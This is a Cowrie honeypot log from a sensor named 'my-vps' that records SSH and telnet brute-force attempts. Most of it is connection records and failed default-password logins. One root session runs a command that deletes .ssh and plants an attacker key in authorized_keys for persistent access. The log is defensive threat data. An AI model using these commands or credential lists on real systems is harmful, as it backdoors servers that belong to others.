ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.440807Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.441773Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47570,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbbb8befd51d","protocol":"ssh","message":"New connection: 212.227.125.160:47570 (1.2.3.4:22) [session: fbbb8befd51d]","sensor":"my-vps","timestamp":"2025-08-28T05:47:22.415572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:22.434437Z","src_ip":"212.227.125.160","session":"fbbb8befd51d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:22.524073Z","src_ip":"212.227.125.160","session":"fbbb8befd51d"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:22.940609Z","src_ip":"212.227.125.160","session":"fbbb8befd51d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:24.048169Z","src_ip":"212.227.125.160","session":"fbbb8befd51d"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:27.371158Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45740,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ada5db7a55e","protocol":"ssh","message":"New connection: 212.227.235.229:45740 (1.2.3.4:22) [session: 3ada5db7a55e]","sensor":"my-vps","timestamp":"2025-08-28T05:47:29.604464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:29.618362Z","src_ip":"212.227.235.229","session":"3ada5db7a55e"}
{"eventid":"cowrie.session.connect","src_ip":"121.152.78.212","src_port":60711,"dst_ip":"1.2.3.4","dst_port":23,"session":"1685a83ea513","protocol":"telnet","message":"New connection: 121.152.78.212:60711 (1.2.3.4:23) [session: 1685a83ea513]","sensor":"my-vps","timestamp":"2025-08-28T05:47:29.657714Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:29.750293Z","src_ip":"212.227.235.229","session":"3ada5db7a55e"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:30.330526Z","src_ip":"212.227.235.229","session":"3ada5db7a55e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:31.478284Z","src_ip":"212.227.235.229","session":"3ada5db7a55e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45065,"dst_ip":"1.2.3.4","dst_port":23,"session":"c577dbee9c08","protocol":"telnet","message":"New connection: 212.227.125.160:45065 (1.2.3.4:23) [session: c577dbee9c08]","sensor":"my-vps","timestamp":"2025-08-28T05:47:32.505754Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38380,"dst_ip":"1.2.3.4","dst_port":23,"session":"86bb1cf77a62","protocol":"telnet","message":"New connection: 212.227.235.229:38380 (1.2.3.4:23) [session: 86bb1cf77a62]","sensor":"my-vps","timestamp":"2025-08-28T05:47:33.642354Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42244,"dst_ip":"1.2.3.4","dst_port":22,"session":"092ca0e7b52a","protocol":"ssh","message":"New connection: 212.227.125.160:42244 (1.2.3.4:22) [session: 092ca0e7b52a]","sensor":"my-vps","timestamp":"2025-08-28T05:47:36.945893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:36.979494Z","src_ip":"212.227.125.160","session":"092ca0e7b52a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:37.071189Z","src_ip":"212.227.125.160","session":"092ca0e7b52a"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:37.464184Z","src_ip":"212.227.125.160","session":"092ca0e7b52a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:38.569613Z","src_ip":"212.227.125.160","session":"092ca0e7b52a"}
{"eventid":"cowrie.session.connect","src_ip":"167.71.43.79","src_port":44016,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b82988af1f","protocol":"ssh","message":"New connection: 167.71.43.79:44016 (1.2.3.4:22) [session: 95b82988af1f]","sensor":"my-vps","timestamp":"2025-08-28T05:47:41.889867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:47:41.890789Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:47:41.901661Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456!@#","message":"login attempt [root/Ab123456!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:47:41.985865Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:47:42.116863Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.117695Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.118907Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.130800Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:47:42.234615Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.235382Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.248152Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.249006Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.session.connect","src_ip":"167.71.43.79","src_port":44030,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d5d6c38bbb5","protocol":"ssh","message":"New connection: 167.71.43.79:44030 (1.2.3.4:22) [session: 8d5d6c38bbb5]","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.258435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.259178Z","src_ip":"167.71.43.79","session":"8d5d6c38bbb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.270001Z","src_ip":"167.71.43.79","session":"8d5d6c38bbb5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:42.353846Z","src_ip":"167.71.43.79","session":"8d5d6c38bbb5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.367163Z","src_ip":"167.71.43.79","session":"8d5d6c38bbb5"}
{"eventid":"cowrie.session.connect","src_ip":"167.71.43.79","src_port":44034,"dst_ip":"1.2.3.4","dst_port":22,"session":"3796baf80c14","protocol":"ssh","message":"New connection: 167.71.43.79:44034 (1.2.3.4:22) [session: 3796baf80c14]","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.377257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.378026Z","src_ip":"167.71.43.79","session":"3796baf80c14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.388994Z","src_ip":"167.71.43.79","session":"3796baf80c14"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.473593Z","src_ip":"167.71.43.79","session":"3796baf80c14"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.487713Z","src_ip":"167.71.43.79","session":"95b82988af1f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:43.488617Z","src_ip":"167.71.43.79","session":"3796baf80c14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36634,"dst_ip":"1.2.3.4","dst_port":22,"session":"e40751f275aa","protocol":"ssh","message":"New connection: 212.227.235.229:36634 (1.2.3.4:22) [session: e40751f275aa]","sensor":"my-vps","timestamp":"2025-08-28T05:47:44.050845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:44.051667Z","src_ip":"212.227.235.229","session":"e40751f275aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:44.195930Z","src_ip":"212.227.235.229","session":"e40751f275aa"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:44.638341Z","src_ip":"212.227.235.229","session":"e40751f275aa"}
{"eventid":"cowrie.session.closed","duration":12.991261720657349,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:45.496954Z","src_ip":"212.227.125.160","session":"c577dbee9c08"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:45.784124Z","src_ip":"212.227.235.229","session":"e40751f275aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59570,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2abe24f53d9","protocol":"telnet","message":"New connection: 212.227.125.160:59570 (1.2.3.4:23) [session: b2abe24f53d9]","sensor":"my-vps","timestamp":"2025-08-28T05:47:46.587637Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":35386,"dst_ip":"1.2.3.4","dst_port":23,"session":"75068eb82600","protocol":"telnet","message":"New connection: 8.222.212.69:35386 (1.2.3.4:23) [session: 75068eb82600]","sensor":"my-vps","timestamp":"2025-08-28T05:47:49.289046Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59910,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dac7bf81c2a","protocol":"ssh","message":"New connection: 212.227.125.160:59910 (1.2.3.4:22) [session: 5dac7bf81c2a]","sensor":"my-vps","timestamp":"2025-08-28T05:47:54.764748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:54.765724Z","src_ip":"212.227.125.160","session":"5dac7bf81c2a"}
